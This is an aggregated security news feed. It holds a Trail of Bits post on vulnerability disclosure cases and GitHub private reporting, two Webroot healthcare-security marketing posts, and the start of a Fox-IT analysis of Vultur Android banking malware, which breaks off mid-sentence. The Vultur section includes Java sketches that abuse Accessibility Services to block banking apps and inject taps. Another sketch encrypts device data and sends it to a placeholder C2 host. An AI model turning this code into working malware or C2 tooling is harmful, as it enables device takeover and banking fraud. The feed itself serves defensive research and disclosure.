Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST. From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there. The story would have ended here since we didn’t receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits. The fix was created exactly one week after our last reminder. We suspect that our previous email reminder led to the fix, but we don’t know for sure. Unfortunately, we were never credited appropriately. Case 4: DoS vector in the num-bigint Rust library In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE. The num-bigint project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint by sending an email. But finding the developer’s email is error-prone and takes time. Instead of sending the bug report directly, you must first confirm that you’ve reached the correct person via email and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel to send vulnerabilities through would be clear. But now let’s discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or if the requested memory allocation is too large and fails. The num-bigint types implement traits from Serde. This means that any type in the crate can be serialized and deserialized using an arbitrary file format like JSON or the binary format used by the bincode crate. The following example program shows how to use this deserialization feature: use num_bigint::BigUint; use std::io::Read; fn main() -> std::io::Result<()> { let mut buf = Vec::new(); let _ = std::io::stdin().read_to_end(&mut buf)?; let _: BigUint = bincode::deserialize(&buf).unwrap_or_default(); Ok(()) } Figure 3: Example deserialization format It turns out that certain inputs cause the above program to crash. This is because implementing the Visitor trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message memory allocation of 2893606913523067072 bytes failed. 
impl<'de> Visitor<'de> for U32Visitor { type Value = BigUint; {...omitted for brevity...} #[cfg(not(u64_digit))] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { let len = seq.size_hint().unwrap_or(0); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } #[cfg(u64_digit)] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { use crate::big_digit::BigDigit; use num_integer::Integer; let u32_len = seq.size_hint().unwrap_or(0); let len = Integer::div_ceil(&u32_len, &2); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } } Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61–108) We initially contacted the author on July 20, 2023, and the bug was fixed in commit 44c87c1 on August 22, 2023. The fixed version was released the next day as 0.4.4. Case 5: Insertion of MMKV database encryption key into Android system log with react-native-mmkv The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client were informed about the vulnerability. The lack of vulnerability management caused a situation where attackers knew about a vulnerability, but users were left in the dark. During the client engagement, I wanted to validate how the encryption key was used and handled. The commit fix: Don’t leak encryption key in logs in the react-native-mmkv library caught my attention. The following code shows the problematic log statement: MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path, std::string cryptKey) { __android_log_print(ANDROID_LOG_INFO, "RNMMKV", "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)", instanceId.c_str(), path.c_str(), cryptKey.c_str()); std::string* pathPtr = path.size() > 0 ? &path : nullptr; {...omitted for brevity...} Figure 5: Code that initializes MMKV and also logs the encryption key Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled. With the client’s agreement, I notified the author of react-native-mmkv, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers if they use a vulnerable version of react-native-mmkv when running npm audit or npm install. This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to feed the output of the npm audit command is to create a GitHub advisory. Using private reporting streamlines that process. Takeaways GitHub’s private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory database—a link that is missing, for example, when using confidential issues in GitLab. 
With GitHub’s private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers). The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you’ve ever encrypted an email, you know that there are endless pitfalls. However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness. Step 1: Add a security policy Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability. GitHub has two ways to publish a security policy. Either you can create a SECURITY.md file in the repository root, or you can create a user- or organization-wide policy by creating a .github repository and putting a SECURITY.md file in its root. We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following: We have multiple channels for receiving reports: * If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab in the relevant GitHub project: https://github.com/%5BYOUR_ORG%5D/%5BYOUR_PROJECT%5D.
* Send an email to security@example.com Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly. Step 2: Enable private reporting Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it’s publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies. Enabling and using the feature is easy and requires almost no maintenance. The only key is to make sure that you set up GitHub notifications correctly. Reports get sent via email only if you configure email notifications. The reason it’s not enabled by default is that this feature requires active monitoring of your GitHub notifications, or else reports may not get the attention they require. After configuring the notifications, go to the “Security” tab of your repository and click “Enable vulnerability reporting”: Emails about reported vulnerabilities have the subject line “(org/repo) Summary (GHSA-0000-0000-0000).” If you use the website notifications, you will get one like this: If you want to enable private reporting for your whole organization, then check out this documentation. A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If dependent repositories have Dependabot enabled, then dependencies to your project are updated automatically. On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub. This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design. Step 3: Get notifications via webhooks If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. Just enable the following event type: After creating the webhook, repository_advisory events will be sent to the set webhook URL. The event includes the summary and description of the reported vulnerability. How to make security researchers happy If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps avoid researchers becoming annoyed and deciding not to report a bug or, even worse, deciding to turn the vulnerability into an exploit or release it as a 0-day. If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting. If you’re not a GitHub user, similar features also exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; for instance, Gitea is missing such a feature. 
The reason we focused on GitHub in this post is because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable channels set up.
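As a small complement to Step 3 above, this is roughly what a bare-bones receiver for repository_advisory webhook events could look like using only the Python standard library. The port, the WEBHOOK_SECRET environment variable, and the payload fields printed at the end are assumptions; GitHub's signature scheme (an HMAC-SHA256 of the raw body delivered in the X-Hub-Signature-256 header) is documented behavior, but check the current webhook documentation for the exact event schema before relying on this sketch.

"""Illustrative receiver for GitHub repository_advisory webhook events."""
import hashlib
import hmac
import json
import os
from http.server import BaseHTTPRequestHandler, HTTPServer

SECRET = os.environ.get("WEBHOOK_SECRET", "").encode()  # assumed shared secret

class AdvisoryHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))

        # GitHub signs the raw body with HMAC-SHA256 and the shared secret.
        expected = "sha256=" + hmac.new(SECRET, body, hashlib.sha256).hexdigest()
        received = self.headers.get("X-Hub-Signature-256", "")
        if not hmac.compare_digest(expected, received):
            self.send_response(401)
            self.end_headers()
            return

        if self.headers.get("X-GitHub-Event") == "repository_advisory":
            payload = json.loads(body)
            advisory = payload.get("repository_advisory", {})
            # Forward to chat, a ticketing system, etc.; here we just log it.
            print(payload.get("action"), advisory.get("summary"), advisory.get("severity"))

        self.send_response(204)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), AdvisoryHandler).serve_forever()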
Categories: Security Posts

3 healthcare organizations that are building cyber resilience

Webroot - Fri, 2024/04/05 - 20:15
From 2018 to 2023, healthcare data breaches have increased by 93 percent. And ransomware attacks have grown by 278 percent over the same period. Healthcare organizations can’t afford to let preventable breaches slip by. Globally, the average cost of a healthcare data breach has reached $10.93 million. The situation for healthcare organizations may seem bleak. But there is hope. Focus on layering your security posture to focus on threat prevention, protection, and recovery. Check out three healthcare organizations that are strengthening their cyber resilience with layered security tools. 1. Memorial Hermann balances user experience with encryption Email encryption keeps sensitive medical data safe and organizations compliant. Unfortunately, providers will skip it if the encryption tool is difficult to use. Memorial Hermann ran into this exact issue. Juggling compliance requirements with productivity needs, the organization worried about the user experience for email encryption. Webroot Email Encryption powered by Zix provides the solution. Nearly 75 percent of Memorial Hermann’s encrypted emails go to customers who share Webroot. Now more than 1,750 outside organizations can access encrypted email right from their inbox, with no extra steps or passwords. Read the full case study. 2. Allergy, Asthma and Sinus Center safeguards email The center needed to protect electronic medical records (EMR). But its old software solution required technical oversight that was difficult to manage. Webroot Email Threat Protection by OpenText gives the healthcare organization an easy way to keep EMR secure. OpenText’s in-house research team is continually monitoring new and emerging threats to ensure the center’s threat protection is always up to date. With high-quality protection and a low-maintenance design, the IT team can focus on other projects. When patient data is at stake, the center knows it can trust Webroot. Read the full case study. 3. Radiology Associates avoid downtime with fast recovery Radiologists need to read and interpret patient reports so they can quickly share them with doctors. Their patients’ health can’t afford for them to have downtime. After an unexpected server crash corrupted its database, Radiology Associates needed a way to avoid workflow interruptions. Carbonite Recover by OpenText helps the organization get back to business quickly in the event of a data breach or natural disaster. Plus, the price of the solution and ease of use gave Radiology Associates good reasons to choose our solution. Read the full case study. Conclusion As ransomware becomes more sophisticated and data breaches occur more frequently, healthcare organizations must stay vigilant. Strong cyber resilience should be a priority so that you can protect patient privacy and maintain trust within the healthcare industry. And you don’t have to do it alone. We’re ready to help out as your trusted cybersecurity partner. Together, we can prevent data breaches, protect sensitive data, and help you recover when disaster strikes. Contact us to learn more about our cybersecurity solutions. The post 3 healthcare organizations that are building cyber resilience appeared first on Webroot Blog.
Categories: Security Posts

5 ways to strengthen healthcare cybersecurity

Webroot - Fri, 2024/04/05 - 19:44
Ransomware attacks are targeting healthcare organizations more frequently. The number of costly cyberattacks on US hospitals has doubled. So how do you prevent these attacks? Keep reading to learn five ways you can strengthen security at your organization. But first, let's find out what's at stake. Why healthcare needs better cybersecurity Healthcare organizations are especially vulnerable to data breaches because of how much data they hold. And when a breach happens, it creates financial burdens and affects regulatory compliance. On average, the cost of a healthcare data breach globally is $10.93 million. Noncompliance not only incurs more costs but also hurts patient trust. Once that trust is lost, it's difficult to regain it, which can impact your business and standing within the industry. Adopting a layered security approach will help your organization prevent these attacks. Here are five ways to strengthen your cybersecurity: 1. Use preventive security technology Prevention, as the saying goes, is better than the cure. With the right systems and the right methodology, it's possible to detect and intercept most cyberthreats before they lead to a data breach, a loss of service, or a deterioration in patient care.
Examples of prevention-layer technologies include endpoint protection and email encryption. 2. Provide cybersecurity training According to Verizon, 82 percent of all breaches involve a human element. Sometimes malicious insiders create security vulnerabilities. Other times, well-intentioned employees fall victim to attacks like phishing: legitimate-looking emails that trick employees into giving attackers their credentials or other sensitive information—like patient data. In fact, 16 percent of breaches start with phishing. When your employees receive basic cybersecurity training, they are more likely to recognize bad actors, report suspicious activity, and avoid risky behavior. You can outsource cybersecurity training or find an automated security training solution that you manage. 3. Ensure regulatory compliance Healthcare providers are subject to strict data privacy regulations like HIPAA and GDPR. If an avoidable data breach occurs, organizations face hefty fines from state and federal authorities. The email and endpoint protection tools described above help you stay compliant with these regulations. But sometimes a breach is out of your control. So regulators have provided guidelines for how to respond, including investigation, notification, and recovery. 4. Build business recovery plans Adding a recovery plan to your multilayered security approach is crucial to achieving and maintaining cyber resilient healthcare. Ideally, you'll catch most incoming threats before they become an issue. However, the recovery layer is critical when threats do get through or disasters occur. You might think that your cloud-based applications back up and secure your data. But SaaS vendors explicitly state that data protection and backup are the customer's responsibility. Some SaaS applications have recovery options, but they're limited and ineffective. A separate backup system is necessary to ensure business continuity. Reasons for implementing a solid recovery strategy include:
  • Re-establishing patient trust.
  • Avoiding disruptions to patient care.
  • Remaining compliant with HIPAA and GDPR requirements.
Remember, lives depend on getting your systems back up quickly. That’s why your healthcare organization needs a secure, continuously updated backup and recovery solution for local and cloud servers. 5. Monitor and improve continuously Once you have your multilayered security approach in place, you’ll need a centralized management console to help you monitor and control all your security services. This single pane of glass gives you real-time cyber intelligence and all the tools you need to protect your healthcare organization, your reputation, and your investment in digital transformation. You can also spot gaps in your approach and find ways to improve. Conclusion Cybersecurity can seem daunting at times. Just remember that every step you take toward cyber resilience helps you protect patient privacy and maintain your credibility within the healthcare industry.
So when you’re feeling overwhelmed or stuck, remember the five ways you can strengthen your layered cybersecurity approach:
  1. Use preventive technology like endpoint protection and email encryption.
  2. Train your employees to recognize malicious activities like phishing.
  3. Ensure that you’re compliant with HIPAA, GDPR, and any other applicable regulations.
  4. Recover your data after a breach with backup and recovery tools.
  5. Monitor your data and improve your approach when necessary.
The post 5 ways to strengthen healthcare cybersecurity appeared first on Webroot Blog.
Categorías: Security Posts

Android Malware Vultur Expands Its Wingspan

Fox-IT - Jue, 2024/03/28 - 12:00
Authored by Joshua Kamp Executive summary The authors behind Android banking malware Vultur have been spotted adding new technical features, which give the malware operator additional ways to interact remotely with the victim’s mobile device. Vultur has also started masking more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted on the fly, and using the guise of legitimate applications to carry out its malicious actions. Key takeaways
  • The authors behind Vultur, an Android banker that was first discovered in March 2021, have been spotted adding new technical features.
  • New technical features include the ability to:
    • Download, upload, delete, install, and find files;
    • Control the infected device using Android Accessibility Services (sending commands to perform scrolls, swipe gestures, clicks, mute/unmute audio, and more);
    • Prevent apps from running;
    • Display a custom notification in the status bar;
    • Disable Keyguard in order to bypass lock screen security measures.
  • While the new features mostly revolve around interacting remotely with the victim’s device in a more flexible way, Vultur still contains the remote access functionality using AlphaVNC and ngrok that it had back in 2021.
  • Vultur has improved upon its anti-analysis and detection evasion techniques by:
    • Modifying legitimate apps (use of McAfee Security and Android Accessibility Suite package name);
    • Using native code in order to decrypt payloads (a short Java sketch of this routine follows this list);
    • Spreading malicious code over multiple payloads;
    • Using AES encryption and Base64 encoding for its C2 communication.
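As a rough illustration of the native payload decryption highlighted above (and analysed in detail later in this post), the routine boils down to deriving a 16-character AES key from a hard-coded string and decrypting an asset with AES/ECB/PKCS5Padding. The Java sketch below re-implements that logic for static unpacking; it is a hypothetical re-implementation rather than the malware's own code, the asset name and key string are the ones observed in the analysed sample, and keys vary across samples:

import java.nio.file.Files;
import java.nio.file.Paths;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class PayloadDecryptor {
    // Hypothetical Java re-implementation of the native Lib.d() helper described later in this
    // post: the AES key is the substring from index 6 to 22 of a hard-coded string.
    static byte[] decrypt(byte[] encrypted, String keySource) throws Exception {
        String key = keySource.substring(6, 22); // "QWNMWkVQN21ucmNi" in the analysed sample
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding"); // mode reported in the analysis
        cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(key.getBytes("UTF-8"), "AES"));
        return cipher.doFinal(encrypted);
    }

    public static void main(String[] args) throws Exception {
        // Asset file name and key source string as observed in the analysed dropper sample.
        byte[] blob = Files.readAllBytes(Paths.get("assets/78a01b34-2439-41c2-8ab7-d97f3ec158c6"));
        byte[] apk = decrypt(blob, "IPIjf4QWNMWkVQN21ucmNiUDZaVw==");
        Files.write(Paths.get("vultur_payload1.apk"), apk); // decrypted first Vultur payload
    }
}

Running something along these lines against the dropper's assets directory should yield the embedded APK of the next stage, provided the per-sample key string has first been recovered from the native library.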
Introduction Vultur is one of the first Android banking malware families to include screen recording capabilities. It contains features such as keylogging and interacting with the victim’s device screen. Vultur mainly targets banking apps for keylogging and remote control. Vultur was first discovered by ThreatFabric in late March 2021. Back then, Vultur (ab)used the legitimate software products AlphaVNC and ngrok for remote access to the VNC server running on the victim’s device. Vultur was distributed through a dropper-framework called Brunhilda, responsible for hosting malicious applications on the Google Play Store [1]. The initial blog on Vultur uncovered that there is a notable connection between these two malware families, as they are both developed by the same threat actors [2]. In a recent campaign, the Brunhilda dropper is spread in a hybrid attack using both SMS and a phone call. The first SMS message guides the victim to a phone call. When the victim calls the number, the fraudster provides the victim with a second SMS that includes the link to the dropper: a modified version of the McAfee Security app. The dropper deploys an updated version of Vultur banking malware through 3 payloads, where the final 2 Vultur payloads effectively work together by invoking each other’s functionality. The payloads are installed when the infected device has successfully registered with the Brunhilda Command-and-Control (C2) server. In the latest version of Vultur, the threat actors have added a total of 7 new C2 methods and 41 new Firebase Cloud Messaging (FCM) commands. Most of the added commands are related to remote access functionality using Android’s Accessibility Services, allowing the malware operator to remotely interact with the victim’s screen in a way that is more flexible compared to the use of AlphaVNC and ngrok. In this blog we provide a comprehensive analysis of Vultur, beginning with an overview of its infection chain. We then delve into its new features, uncover its obfuscation techniques and evasion methods, and examine its execution flow. Following that, we dissect its C2 communication, discuss detection based on YARA, and draw conclusions. Let’s soar alongside Vultur’s smarter mobile malware strategies! Infection chain In order to deceive unsuspecting individuals into installing malware, the threat actors employ a hybrid attack using two SMS messages and a phone call. First, the victim receives an SMS message that instructs them to call a number if they did not authorise a transaction involving a large amount of money. In reality, this transaction never occurred, but it creates a false sense of urgency to trick the victim into acting quickly. A second SMS is sent during the phone call, where the victim is instructed into installing a trojanised version of the McAfee Security app from a link. This application is actually Brunhilda dropper, which looks benign to the victim as it contains functionality that the original McAfee Security app would have. As illustrated below, this dropper decrypts and executes a total of 3 Vultur-related payloads, giving the threat actors total control over the victim’s mobile device. Figure 1: Visualisation of the complete infection chain. Note: communication with the C2 server occurs during every malware stage. New features in Vultur The latest updates to Vultur bring some interesting changes worth discussing. 
The most intriguing addition is the malware’s ability to remotely interact with the infected device through the use of Android’s Accessibility Services. The malware operator can now send commands in order to perform clicks, scrolls, swipe gestures, and more. Firebase Cloud Messaging (FCM), a messaging service provided by Google, is used for sending messages from the C2 server to the infected device. The message sent by the malware operator through FCM can contain a command, which, upon receipt, triggers the execution of corresponding functionality within the malware. This eliminates the need for an ongoing connection with the device, as can be seen from the code snippet below. Figure 2: Decompiled code snippet showing Vultur’s ability to perform clicks and scrolls using Accessibility Services. Note for this (and upcoming) screenshot(s): some variables, classes and method names were renamed by the analyst. Pink strings indicate that they were decrypted. While Vultur can still maintain an ongoing remote connection with the device through the use of AlphaVNC and ngrok, the new Accessibility Services related FCM commands provide the actor with more flexibility. In addition to its more advanced remote control capabilities, Vultur introduced file manager functionality in the latest version. The file manager feature includes the ability to download, upload, delete, install, and find files. This effectively grants the actor(s) with even more control over the infected device. Figure 3: Decompiled code snippet showing part of the file manager related functionality. Another interesting new feature is the ability to block the victim from interacting with apps on the device. Regarding this functionality, the malware operator can specify a list of apps to press back on when detected as running on the device. The actor can include custom HTML code as a “template” for blocked apps. The list of apps to block and the corresponding HTML code to be displayed is retrieved through the vnc.blocked.packages C2 method. This is then stored in the app’s SharedPreferences. If available, the HTML code related to the blocked app will be displayed in a WebView after it presses back. If no HTML code is set for the app to block, it shows a default “Temporarily Unavailable” message after pressing back. For this feature, payload #3 interacts with code defined in payload #2. Figure 4: Decompiled code snippet showing part of Vultur’s implementation for blocking apps. The use of Android’s Accessibility Services to perform RAT related functionality (such as pressing back, performing clicks and swipe gestures) is something that is not new in Android malware. In fact, it is present in most Android bankers today. The latest features in Vultur show that its actors are catching up with this trend, and are even including functionality that is less common in Android RATs and bankers, such as controlling the device volume. A full list of Vultur’s updated and new C2 methods / FCM commands can be found in the “C2 Communication” section of this blog. Obfuscation techniques & detection evasion Like a crafty bird camouflaging its nest, Vultur now employs a set of new obfuscation and detection evasion techniques when compared to its previous versions. Let’s look into some of the notable updates that set apart the latest variant from older editions of Vultur. 
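To give a feel for the general mechanism before moving on to the obfuscation changes: the sketch below is a generic, hypothetical Accessibility Service (not Vultur's decompiled code) showing how little is needed to press back on a "blocked" package and to dispatch a tap at operator-supplied coordinates once the victim has enabled the service.

import android.accessibilityservice.AccessibilityService;
import android.accessibilityservice.GestureDescription;
import android.graphics.Path;
import android.view.accessibility.AccessibilityEvent;
import java.util.Collections;
import java.util.Set;

// Generic sketch of Accessibility Services abuse; class, field and package names are hypothetical.
public class RemoteControlService extends AccessibilityService {
    // Vultur retrieves its block list via the vnc.blocked.packages C2 method; hard-coded here.
    private final Set<String> blockedPackages = Collections.singleton("com.example.bank");

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        CharSequence pkg = event.getPackageName();
        if (pkg != null && blockedPackages.contains(pkg.toString())) {
            performGlobalAction(GLOBAL_ACTION_BACK); // "press back" when a blocked app shows up
        }
    }

    // Dispatches a short tap at the given screen coordinates, e.g. in response to an FCM command.
    void clickAt(float x, float y) {
        Path path = new Path();
        path.moveTo(x, y);
        GestureDescription gesture = new GestureDescription.Builder()
                .addStroke(new GestureDescription.StrokeDescription(path, 0, 50))
                .build();
        dispatchGesture(gesture, null, null);
    }

    @Override
    public void onInterrupt() { }
}

Swipes and scrolls are just longer stroke paths, and the blocked-app behaviour described above amounts to showing a WebView after the back press. Everything hinges on the victim enabling the service, which is exactly what the fake "McAfee Master Protection" instructions in payload #1 (discussed later) are designed to achieve.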
AES encrypted and Base64 encoded HTTPS traffic In October 2022, ThreatFabric mentioned that Brunhilda started using string obfuscation using AES with a varying key in the malware samples themselves [3]. At this point in time, both Brunhilda and Vultur did not encrypt its HTTP requests. That has changed now, however, with the malware developer’s adoption of AES encryption and Base64 encoding requests in the latest variants. Figure 5: Example AES encrypted and Base64 encoded request for bot registration. By encrypting its communications, malware can evade detection of security solutions that rely on inspecting network traffic for known patterns of malicious activity. The decrypted content of the request can be seen below. Note that the list of installed apps is shown as Base64 encoded text, as this list is encoded before encryption. {"id":"6500","method":"application.register","params":{"package":"com.wsandroid.suite","device":"Android/10","model":"samsung GT-I900","country":"sv-SE","apps":"cHQubm92b2JhbmNvLm5iYXBwO3B0LnNhbnRhbmRlcnRvdHRhLm1vYmlsZXBhcnRpY3VsYXJlcztzYS5hbHJhamhpYmFuay50YWh3ZWVsYXBwO3NhLmNvbS5zZS5hbGthaHJhYmE7c2EuY29tLnN0Y3BheTtzYW1zdW5nLnNldHRpbmdzLnBhc3M7c2Ftc3VuZy5zZXR0aW5ncy5waW47c29mdGF4LnBla2FvLnBvd2VycGF5O3RzYi5tb2JpbGViYW5raW5nO3VrLmNvLmhzYmMuaHNiY3VrbW9iaWxlYmFua2luZzt1ay5jby5tYm5hLmNhcmRzZXJ2aWNlcy5hbmRyb2lkO3VrLmNvLm1ldHJvYmFua29ubGluZS5tb2JpbGUuYW5kcm9pZC5wcm9kdWN0aW9uO3VrLmNvLnNhbnRhbmRlci5zYW50YW5kZXJVSzt1ay5jby50ZXNjb21vYmlsZS5hbmRyb2lkO3VrLmNvLnRzYi5uZXdtb2JpbGViYW5rO3VzLnpvb20udmlkZW9tZWV0aW5nczt3aXQuYW5kcm9pZC5iY3BCYW5raW5nQXBwLm1pbGxlbm5pdW07d2l0LmFuZHJvaWQuYmNwQmFua2luZ0FwcC5taWxsZW5uaXVtUEw7d3d3LmluZ2RpcmVjdC5uYXRpdmVmcmFtZTtzZS5zd2VkYmFuay5tb2JpbA==","tag":"dropper2"} Utilisation of legitimate package names The dropper is a modified version of the legitimate McAfee Security app. In order to masquerade malicious actions, it contains functionality that the official McAfee Security app would have. This has proven to be effective for the threat actors, as the dropper currently has a very low detection rate when analysed on VirusTotal. Figure 6: Brunhilda dropper’s detection rate on VirusTotal. Next to modding the legitimate McAfee Security app, Vultur uses the official Android Accessibility Suite package name for its Accessibility Service. This will be further discussed in the execution flow section of this blog. Figure 7: Snippet of Vultur’s AndroidManifest.xml file, where its Accessibility Service is defined with the Android Accessibility Suite package name. Leveraging native code for payload decryption Native code is typically written in languages like C or C++, which are lower-level than Java or Kotlin, the most popular languages used for Android application development. This means that the code is closer to the machine language of the processor, thus requiring a deeper understanding of lower-level programming concepts. Brunhilda and Vultur have started using native code for decryption of payloads, likely in order to make the samples harder to reverse engineer. Distributing malicious code across multiple payloads In this blog post we show how Brunhilda drops a total of 3 Vultur-related payloads: two APK files and one DEX file. We also showcase how payload #2 and #3 can effectively work together. This fragmentation can complicate the analysis process, as multiple components must be assembled to reveal the malware’s complete functionality. Execution flow: A three-headed… bird? 
While previous versions of Brunhilda delivered Vultur through a single payload, the latest variant now drops Vultur in three layers. The Brunhilda dropper in this campaign is a modified version of the legitimate McAfee Security app, which makes it seem harmless to the victim upon execution as it includes functionality that the official McAfee Security app would have. Figure 8: The modded version of the McAfee Security app is launched. In the background, the infected device registers with its C2 server through the /ejr/ endpoint and the application.register method. In the related HTTP POST request, the C2 is provided with the following information:
  • Malware package name (as the dropper is a modified version of the McAfee Security app, it sends the official com.wsandroid.suite package name);
  • Android version;
  • Device model;
  • Language and country code (example: sv-SE);
  • Base64 encoded list of installed applications;
  • Tag (dropper campaign name, example: dropper2).
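On the wire, this registration is a JSON-RPC 2.0 body (like the decrypted application.register example shown earlier) that is AES encrypted and Base64 encoded before being POSTed to the /ejr/ endpoint. The key handling and cipher mode used for the C2 traffic are not spelled out in this post, so the Java sketch below uses a placeholder key, a placeholder C2 host, and AES/ECB/PKCS5Padding purely as assumptions to show the overall shape of the exchange:

import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.Base64;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;

public class C2RegistrationSketch {
    public static void main(String[] args) throws Exception {
        // JSON-RPC 2.0 body, shaped like the decrypted application.register example shown earlier.
        String body = "{\"id\":\"6500\",\"method\":\"application.register\","
                + "\"params\":{\"package\":\"com.wsandroid.suite\",\"device\":\"Android/10\"}}";

        // Assumption: this key and cipher mode are placeholders; the analysis only states that
        // C2 traffic is AES encrypted and Base64 encoded, not which mode or key is used.
        SecretKeySpec key = new SecretKeySpec("0123456789abcdef".getBytes("UTF-8"), "AES");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE, key);
        String encoded = Base64.getEncoder().encodeToString(cipher.doFinal(body.getBytes("UTF-8")));

        // POST the encrypted, encoded blob to the /ejr/ endpoint (placeholder C2 host).
        HttpURLConnection conn = (HttpURLConnection) new URL("https://c2.example/ejr/").openConnection();
        conn.setRequestMethod("POST");
        conn.setDoOutput(true);
        try (OutputStream out = conn.getOutputStream()) {
            out.write(encoded.getBytes("UTF-8"));
        }
        System.out.println("HTTP " + conn.getResponseCode());
    }
}

The server response is wrapped the same way, which is why network defences that only look for plaintext indicators see nothing but Base64 blobs.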
The server response is decrypted and stored in a SharedPreference key named 9bd25f13-c3f8-4503-ab34-4bbd63004b6e, where the value indicates whether the registration was successful or not. After successfully registering the bot with the dropper C2, the first Vultur payload is eventually decrypted and installed from an onClick() method. Figure 9: Decryption and installation of the first Vultur payload. In this sample, the encrypted data is hidden in a file named 78a01b34-2439-41c2-8ab7-d97f3ec158c6 that is stored within the app’s “assets” directory. When decrypted, this will reveal an APK file to be installed. The decryption algorithm is implemented in native code, and reveals that it uses AES/ECB/PKCS5Padding to decrypt the first embedded file. The Lib.d() function grabs a substring from index 6 to 22 of the second argument (IPIjf4QWNMWkVQN21ucmNiUDZaVw==) to get the decryption key. The key used in this sample is: QWNMWkVQN21ucmNi (key varies across samples). With this information we can decrypt the 78a01b34-2439-41c2-8ab7-d97f3ec158c6 file, which brings us another APK file to examine: the first Vultur payload. Layer 1: Vultur unveils itself The first Vultur payload also contains the application.register method. The bot registers itself again with the C2 server as observed in the dropper sample. This time, it sends the package name of the current payload (se.accessibility.app in this example), which is not a modded application. The “tag” that was related to the dropper campaign is also removed in this second registration request. The server response contains an encrypted token for further communication with the C2 server and is stored in the SharedPreference key f9078181-3126-4ff5-906e-a38051505098. Figure 10: Decompiled code snippet that shows the data to be sent to the C2 server during bot registration. The main purpose of this first payload is to obtain Accessibility Service privileges and install the next Vultur APK file. Apps with Accessibility Service permissions can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities, such as keylogging, automatically granting itself additional permissions, monitoring foreground apps and overlaying them with phishing windows. In order to gain further control over the infected device, this payload displays custom HTML code that contains instructions to enable Accessibility Services permissions. The HTML code to be displayed in a WebView is retrieved from the installer.config C2 method, where the HTML code is stored in the SharedPreference key bbd1e64e-eba3-463c-95f3-c3bbb35b5907. Figure 11: HTML code is loaded in a WebView, where the 